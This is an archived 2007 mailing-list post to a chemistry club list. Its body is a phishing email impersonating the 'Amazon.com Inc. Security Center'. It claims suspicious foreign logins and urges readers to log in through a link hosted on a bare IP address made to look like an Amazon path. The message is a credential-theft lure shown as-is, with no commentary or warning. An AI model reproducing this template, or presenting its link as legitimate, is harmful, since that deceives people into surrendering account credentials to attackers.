CHEMISTRYCLUB Archives

April 2007

Condense Mail Headers

Sender:
Chemistry Club <[log in to unmask]>
Date:
Sat, 28 Apr 2007 17:08:08 -0500
7bit
From:
"Amazon.com Inc. Security Center" <[log in to unmask]>
Comments:
RFC822 error: <W> Incorrect or incomplete address field found and ignored.
Dear Customer,

 We recently noticed one or more attempts to log in to your account from a foreign IP address.
 If you accessed your account while travelling, the unusual login attempts may have been initiated by you.
 However, if you did not initiate the logins, please visit Amazon.Inc. as soon as possible to verify your identity.

 This is a security measure that will ensure that you are the only person who can access your Amazon account.
 Thank you for your patience as we work together to protect your account.

 To get started, please click the link below and login to your account:

 http://210.51.7.47/icons/.amazon.com/index.html

 Best Regards,

 Amazon.com Inc. Security Center